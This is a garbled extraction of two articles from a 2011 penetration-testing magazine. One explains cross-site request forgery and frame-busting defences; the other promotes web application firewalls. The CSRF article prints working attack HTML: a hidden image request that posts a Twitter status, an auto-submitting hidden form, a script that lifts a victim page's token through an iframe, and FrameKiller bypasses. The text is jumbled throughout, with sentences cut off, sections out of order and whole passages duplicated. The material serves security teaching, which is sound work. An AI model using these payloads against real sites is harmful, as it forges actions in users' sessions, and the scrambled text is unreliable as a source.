bull Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
bull Same Origin Policy
bull FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38, http://pentestmag.com, 01/2011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
bull All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
bull Cross-Site Scripting (XSS)
bull Hidden Field Tampering
bull Parameter Tampering
bull Cookie Poisoning
bull Buffer Overflow
bull Forceful Browsing
bull Unauthorized access to web servers
bull Search Engine Poisoning
bull Social Engineering
The only more recent trend: attackers have lately started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations that are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch the weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely on nothing more than session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks communication at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase performance for the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, valid characters and permitted value range.
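The parameter rules described here can be sketched as a small rule table. All names, limits and the rule format below are invented for illustration, not taken from any real WAF:

```javascript
// Sketch: per-form parameter rules a WAF might enforce
// (expected names, parameter count, max length, allowed characters).
const rules = {
  '/post.php': {
    message: { maxLength: 140, pattern: /^[\w\s.,!?-]*$/ },
    token:   { maxLength: 32,  pattern: /^[0-9a-f]*$/ },
  },
};

function checkRequest(path, params) {
  const formRules = rules[path];
  if (!formRules) return false; // unknown form: block
  const names = Object.keys(params);
  if (names.length > Object.keys(formRules).length) return false; // extra params
  return names.every((name) => {
    const rule = formRules[name];
    if (!rule) return false; // unexpected parameter name
    const value = String(params[name]);
    return value.length <= rule.maxLength && rule.pattern.test(value);
  });
}
```

Even these coarse checks reject requests with surplus parameters, oversized values or characters outside the permitted set.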
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
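The access-rate rule mentioned above is commonly implemented as a token bucket per client; a minimal sketch (capacity and refill values are arbitrary, chosen only for illustration):

```javascript
// Sketch: per-client token bucket, the usual way a WAF throttles
// brute-force or DoS-style request floods.
const buckets = new Map();

function allowRequest(clientIp, now, capacity = 10, refillPerSec = 1) {
  let b = buckets.get(clientIp);
  if (!b) { b = { tokens: capacity, last: now }; buckets.set(clientIp, b); }
  // Refill proportionally to elapsed time, capped at capacity.
  b.tokens = Math.min(capacity, b.tokens + ((now - b.last) / 1000) * refillPerSec);
  b.last = now;
  if (b.tokens >= 1) { b.tokens -= 1; return true; }
  return false;
}
```

A burst is allowed up to the bucket capacity, after which the client is throttled to the refill rate while other clients remain unaffected.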
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. These filters can then – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
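The combined approach might look like this in outline: a learned whitelist of URLs and parameter names, checked after a static blacklist of known-bad patterns. Both lists here are invented examples, not real WAF rule sets:

```javascript
// Sketch: learning-mode whitelist combined with a static blacklist.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];
const learned = new Map(); // url -> Set of parameter names seen in learning mode

function learn(url, params) {
  if (!learned.has(url)) learned.set(url, new Set());
  for (const p of Object.keys(params)) learned.get(url).add(p);
}

function allow(url, params) {
  // Blacklist first: known-bad patterns are always blocked.
  for (const v of Object.values(params)) {
    if (blacklist.some((re) => re.test(String(v)))) return false;
  }
  // Whitelist: the URL and every parameter must have been seen during learning.
  const known = learned.get(url);
  if (!known) return false;
  return Object.keys(params).every((p) => known.has(p));
}
```

Changing the application means re-learning the whitelist, which is exactly the maintenance burden the paragraph describes.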
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate, based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But Proxy WAFs must also be configured according to the respective requirements. Penetration tests help with the correct configuration.
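The URL translation described above amounts to a lookup from a public path to a hidden backend address. A minimal sketch, with a mapping table invented purely for illustration:

```javascript
// Sketch: reverse-proxy URL rewriting that keeps the real topology cloaked.
// Public paths reveal nothing about backend hosts, ports or technologies.
const routes = new Map([
  ['/shop',  'http://10.0.0.12:8080/legacy-cart/v2/index.jsp'],
  ['/login', 'http://10.0.0.15/auth/servlet/LoginHandler'],
]);

function rewrite(publicPath) {
  const target = routes.get(publicPath);
  return target || null; // unknown paths are simply not forwarded
}
```

A scanner probing the public side sees only the cloaked paths; requests for anything outside the mapping never reach a backend.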
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
bull Does the system have a Web Application Firewall?
bull Does the web traffic pass through a WAF proxy function?
bull Are the web servers shielded against direct access by attackers?
bull Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
bull Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
bull Web Session Management
bull Password management in code
bull ETHical Ghosts on SF1
bull Preservation, namely in the online gambling industry
bull Cyber Security War
Available for download on December 22nd.
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1. HTML code used to bypass protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com" />
    <input type="submit" />
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct (Listing 3):
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers together with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location)
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted with brute-force attacks. Brute forcing one-time tokens is worthwhile for an attacker only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To better understand how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).

Listing 2. Wrong token
<?php session_start()?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker opens the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES, an information security consulting, testing and research company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic: he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of increasingly powerful applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how extensive their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making actions anonymous. As a result the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology; both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have lately started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards retroactively.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
